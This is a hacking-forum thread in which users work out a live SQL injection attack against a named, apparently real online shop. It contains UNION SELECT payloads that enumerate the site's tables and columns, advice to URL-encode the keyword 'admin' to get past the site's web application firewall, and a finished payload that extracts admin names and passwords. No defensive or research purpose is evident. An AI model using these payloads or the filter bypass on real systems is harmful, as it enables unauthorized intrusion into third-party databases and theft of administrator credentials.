Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can't get data but tales and column ok....
Posted by: kenjii
Date: December 07, 2013 10:57AM

here is my news problem ;)

http://www.livsupplies.co.uk/product_list.php?id=11

on this website i can see table ->

http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1111,22222,table_name,444444,55555,database(),77777+from+information_schema.tables+where+table_schema=database()--

it don't need the - before id else i don't work...
And the group_concat seem to not work too...

i can see column ->

http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1111,22222,column_name,444444,55555,database(),77777+from+information_schema.columns+where+table_name=0x61646d696e--


but i can't get the data ->
http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1111,22222,admin_id,444444,55555,database(),77777+from+admin--

can someone tell me why ?

Options: ReplyQuote
Re: can't get data but tales and column ok....
Posted by: firestorm
Date: December 09, 2013 01:17PM

Why : There is a waf/filter which says

Hacking detected!

You have been blocked:
IP + UA

But to notice one important thing, why only your last payload was blocked? What special it had? the keyword 'admin'

So how to bypass?
Simple, dont use a d m i n . URL Encode it .

adminid >> 83 86 88 89 ....so on

Simple!

Options: ReplyQuote
Re: can't get data but tales and column ok....
Posted by: kenjii
Date: December 13, 2013 11:30AM

ha before i give link the "hacking detected" wasn't here...

i have tryed with url encod but for me it seem to work for table/column admin only, on all other tables/columns not working for me :(

but thx for this tips :)

Options: ReplyQuote
Re: can't get data but tales and column ok....
Posted by: firestorm
Date: December 14, 2013 02:10AM

Your welcome!

Options: ReplyQuote
Re: can't get data but tales and column ok....
Posted by: hack2012
Date: December 23, 2013 03:32AM

you can use URLencode to bypass it

http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1,2,%61dmin_firstname,4,5,%61dmin_password,7+from+admin--

for more details, please visit:

http://www.waitalone.cn/waf-bypass-the-url-encoding-method.html



Edited 1 time(s). Last edit at 12/23/2013 03:35AM by hack2012.

Options: ReplyQuote


Sorry, only registered users may post in this forum.